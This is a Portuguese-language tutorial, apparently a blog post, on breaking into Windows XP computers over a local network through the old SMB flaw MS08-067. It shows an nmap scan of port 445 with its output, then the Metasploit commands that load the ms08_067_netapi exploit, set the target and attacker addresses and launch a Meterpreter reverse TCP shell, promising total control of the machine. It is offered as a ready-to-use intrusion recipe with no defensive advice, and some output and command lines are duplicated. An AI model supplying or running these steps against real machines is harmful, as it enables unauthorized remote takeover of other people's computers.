Sim, apesar de antiga esta falha ainda não foi corrigida. É uma falha no protocolo SMB que é responsável pelo compartilhamento de arquivos no Windows. Então se o computador com Windows XP tem algo compartilhado (tem por padão), ele tem grandes chances de estar vulnerável a uma invasão inevitável.
Como invadir?
Usaremos um exploit chamado Microsoft Server Service Relative Path Stack Corruption. Precisaremos ter o Metasploit (Download) instalado em nossa máquina.
Precisamos também verificar se a porta 445 está aberta. Para isso, vamos usar o NMAP (Download) com o seguinte comando:
Comando:
nmap -P0 -p 445 -O 192.168.1.103
Starting Nmap 6.25 ( http://nmap.org ) at 2013-08-02 00:30 E. South America Standard Time
Nmap scan report for 192.168.1.103
Host is up (0.00012s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 08:00:27:8F:93:C2 (Cadmus Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows XP
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3
OS details: Microsoft Windows XP SP2 or SP3
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.20 seconds
Nmap scan report for 192.168.1.103
Host is up (0.00012s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
MAC Address: 08:00:27:8F:93:C2 (Cadmus Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Microsoft Windows XP
OS CPE: cpe:/o:microsoft:windows_xp::sp2 cpe:/o:microsoft:windows_xp::sp3
OS details: Microsoft Windows XP SP2 or SP3
Network Distance: 1 hop
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 2.20 seconds
Veja que o NMAP nos informou que a porta 445 está aberta e que o sistema é Windows XP!
Agora, sabendo que o sistema pode ser vulnerável, precisamos fazer o ato da invasão.
No console do MetaSploit, vamos fazer o seguinte:
Comando:
use exploit/windows/smb/ms08_067_netapi
Agora devemos definir nosso alvo (Neste caso 192.168.1.103)
Comando:
set RHOST 192.168.1.103
Em seguida vamos definir o PAYLOAD e depois o nosso próprio IP (O meu é 192.168.1.104), e depois simplesmente atacar!
Comando:
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.104
exploit
set LHOST 192.168.1.104
exploit
Lembre-se que este metodo só se aplica a máquinas na rede Local!
Isso nos dará total controle da máquina. Bom, veja o vídeo a baixo para mais detalhes!